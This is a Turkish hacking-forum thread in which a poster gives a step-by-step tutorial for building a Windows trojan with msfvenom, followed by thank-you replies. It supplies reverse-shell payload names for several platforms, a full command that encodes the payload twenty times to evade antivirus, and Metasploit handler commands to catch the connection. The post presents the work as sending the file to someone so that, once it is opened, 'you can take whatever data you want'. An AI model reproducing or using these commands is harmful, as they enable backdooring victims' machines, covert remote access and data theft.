Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.



Msfvenom Aracı İle Port Açmadan Trojan Oluşturma / SeNZeRo

Trojan ve Virüsler

Yeni Konu aç Konu Kapatılmıştır
 
Seçenekler
Alt 04-11-2018 01:53   #1
  • Analiz Ekibi Sorumlusu
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 57
Teşekkür (Aldı): 1109


Msfvenom Aracı İle Port Açmadan Trojan Oluşturma / SeNZeRo



Merhaba arkadaşlar. Bugün bir çok kişinin baş belası olan port açma derdini ortadan kaldıracağız. Métasploitin alt dalı olarak sunduğu Msfvenom aracını kullanarak trojan (rat / backdoor) oluşturacağız. Bu işlemi yaparken de port açmayacağız.


Msfvenom Nedir Ve İşe Yarar ?


Msfvenom aracı métasploitin alt dalında yürütülen bir projedir. Daha önceden backdoor oluşturmak için msfpayload aracı kullanılıyordu. Métasploitin msfpayloada verdiği desteğini kesmesi üzerine yeni bir araç olarak msfvenomu çıkarttı. Msfvenom aracı Msfpayload ve Msfencode araçlarının birleşmiş halidir. Bu sayede tek araçla bir çok işi halledebiliyoruz.


Msfvenom aracı hakkında ayrıntılı bilgi için terminale aşağıdaki komutu yazınız.


Kod:
msfvenom -h

Kullanılan bazı parametreler;


-l = Payload, encoder,npos modül tüplerini listeler.
-p = Kullanacağımız payloadı seçmemize yarar.
-f = Çıktının yani oluşturacağımız trojanın hangi türde olacağını seçmemize yarar. Örneğin .exe, dll, asp, vba vs gibi.
-e = Oluşturacağımız trojana bir encoder ekleyerek antivirüslere yakalanmamasını sağlar.
-a = Payloadın çalışacağı mimariyi seçmemize yarar. Desteklenen bazı mimariler x86 and x64, ARM, PPC Sparc dir.
-o = Oluşturduğumuz trojanın nereye çıkacağını belirtmeye yarar.
-b = Kötü karakterleri (bad characters) temizler.
-n = Oluşturulan trojanın başına nopsled ekler.
-s = Oluşturulan trojanın memory alanı boyutunu byte olarak belirleyebiliriz.
-i = Encoding işleminin kaç kez tekrarlanacağını belirtir.
-c = Birleştirilecek shell code' yi belirtmeye yarar.
-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engeller.


Yukarıda trojanı oluştururken kullandığımız parametreleri listeledim. Şimdi de trojanımızı oluşturmaya geçelim.


Genel olarak trojan oluşturma kodu:

Kod:
msfvenom –p <payload adı> --payload-options (seçtiğimiz payloadın ayarlarını yapmamızı sağlar)

Öncelikle payload türümüzü seçmeliyiz. Hangi sistem için yapacak isek onun payloadını seçmeliyiz. Örnek olarak birkaç payload türü:


Windows


Kod:
-p windows/meterpreter/reverse_tcp
Linux

Kod:
-p linux/x86/meterpreter/reverse_tcp
PHP

Kod:
-p php/meterpreter_reverse_tcp
Python

Kod:
-p cmd/unix/reverse_python
Bash

Kod:
-p cmd/unix/reverse_bash

Andorid


Kod:
–p android/meterpreter/reverse_tcp

Ben örnek olarak windows için .exe bir trojan oluşturacağım. Payloadımızı seçtik -p windows/meterpreter/reverse_tcp Payloadı seçtikten sonra LHOST ve LPORT değerlerini yani trojanı attığımız kişi trojanı açarsa bağlantının hangi ip ye gelmesini istediğimizi yazacağız. Bunun için terminale ifconfig yazarak kendi ip adresimizi alıyoruz.


Bu işlemleri yaptıktan sonra komutumuz şu hale geldi:

Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipadresimiz LPORT=4444

Bundan sonra konunun başında belirtmiş olduğum komutları kullanarak trojanın ayarlarını istediğiniz şekilde yapabilirsiniz. Ben örnek olarak aşağıdaki şekilde yapacağım.


Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.151 LPORT=443 -f exe -a x86 -o /root/Masaüstü/trojan.exe --platform windows -e x86/shikata_ga_nai -i 20

Trojanımızı başarılı bir şekilde oluşturduk. Şimdi de oluşturduğumuz trojanı dinlemeye alalım. Yani trojanı birisi açtığında bağlantının gelmesini sağlayacağız.


Bunun için métasploiti msfconsole yazarak çalıştırıyoruz. Métasploit açıldıktan sonra aşağıdaki adımları izliyoruz.


Alıntı:
use exploit/multi/handler >>> Komutu ile dinleme modülüne giriyoruz.
set payload <seçtiğimiz payload> >>> İlk başta seçtiğimiz payloadı yazıyoruz. Ben windows/meterpreter/reverse_tcp seçmiştim.
set LHOST=<kendi ip adresimizi yazıyoruz> >>> Trojanı oluştururken ifconfig komutu ile aldığımız ip adresimizi yazıyoruz.
set LPORT=443 >>> Yazdığımız portu yazıyoruz.
exploit >>> Dinleme işlemini başlatır.

Böylelikle dinleme moduna almış olduk. Attığımız trojanı birisi açarsa buraya düşecek ve istediğiniz bilgileri alabileceksiniz. Konuya trojan açıldıktan, oturum geldikten sonra neler yapabileceğimizi ve istediğimiz verileri nasıl alabileceğimizi de ekleyeceğim. İyi formlar.



___________________________________________

Nûn kadar suskun,
Vâv kadar edebli olabilmeli,
insan...

Konu SeNZeRo tarafından (04-11-2018 10:01 Saat 10:01 ) değiştirilmiştir..
 Online  
 
Alt 04-11-2018 01:55   #2
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
01/2017
Nereden
UnderGround
Yaş
8
Mesajlar
Konular

Teşekkür (Etti): 154
Teşekkür (Aldı): 449




elinize sağlık hocam



___________________________________________

ɱɣ ɲʌɱє ɪƨ ɦɣɗɾʌƭɦʌʅʅєƨ

Ahora es momento de desaparecer..
Bir zamanlar SolidStar..
Bir zamanlar R4V3N...
 Offline  
 
Alt 04-11-2018 02:04   #3
  • Eğitmen
  • Üye Bilgileri
Üyelik tarihi
07/2009
Mesajlar
Konular

Teşekkür (Etti): 533
Teşekkür (Aldı): 387




Eline sağlık güzel konu



___________________________________________

 Offline  
 
Alt 04-11-2018 02:13   #4
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
09/2017
Yaş
29
Mesajlar
Konular

Teşekkür (Etti): 631
Teşekkür (Aldı): 369




elinize sağlık hocam
 Offline  
 
Alt 04-11-2018 03:04   #5
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Elinize Sağlık Hocam
 Offline  
 
Alt 04-11-2018 04:36   #6
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
06/2015
Nereden
C:/
Mesajlar
Konular

Teşekkür (Etti): 273
Teşekkür (Aldı): 248




ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum



___________________________________________

Adalet ayrı şey Adillik ayrı doğrusu adilliktir adalet değil .

 Offline  
 
Alt 04-11-2018 11:46   #7
  • Analiz Ekibi Sorumlusu
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 57
Teşekkür (Aldı): 1109




Alıntı:
HydraThalles´isimli üyeden Alıntı Mesajı göster
elinize sağlık hocam
Alıntı:
ch_arli41´isimli üyeden Alıntı Mesajı göster
Eline sağlık güzel konu
Alıntı:
oldnco´isimli üyeden Alıntı Mesajı göster
elinize sağlık hocam
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Hocam
Alıntı:
Whiteht´isimli üyeden Alıntı Mesajı göster
ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum
Teşekkür ederim, sağolun.



___________________________________________

Nûn kadar suskun,
Vâv kadar edebli olabilmeli,
insan...
 Online  
 
Alt 04-11-2018 11:55   #8
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2015
Nereden
ÖTÜKEN
Mesajlar
Konular

Teşekkür (Etti): 285
Teşekkür (Aldı): 554




Elinize sağlık hocam.



___________________________________________

Hiçbir şeye ihtiyacımız yok, yaInız bir şeye ihtiyacımız vardır; çaIışkan oImak!
_____________________________________________

TÜRK
 Offline  
 
Alt 04-11-2018 12:00   #9
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Trabzon
Yaş
1
Mesajlar
Konular

Teşekkür (Etti): 704
Teşekkür (Aldı): 287




ellerine sağlık ihtiyacım vardı



___________________________________________

-Ernoylmz

  • <Kalbimizde>Solidstar</Kalbimizde>
==>Telegram<==
Cam gibi olacaksın, Kırdılarmı Keseceksin.
 Offline  
 
Alt 04-11-2018 12:16   #10
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
09/2018
Nereden
Ötüken
Mesajlar
Konular
0

Teşekkür (Etti): 77
Teşekkür (Aldı): 8




eline sağlık komutanım
 Offline  
 
Konu Kapatılmıştır

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Siber Güvenlik
Pomeranian Boo
instagram takipci hilesi

wau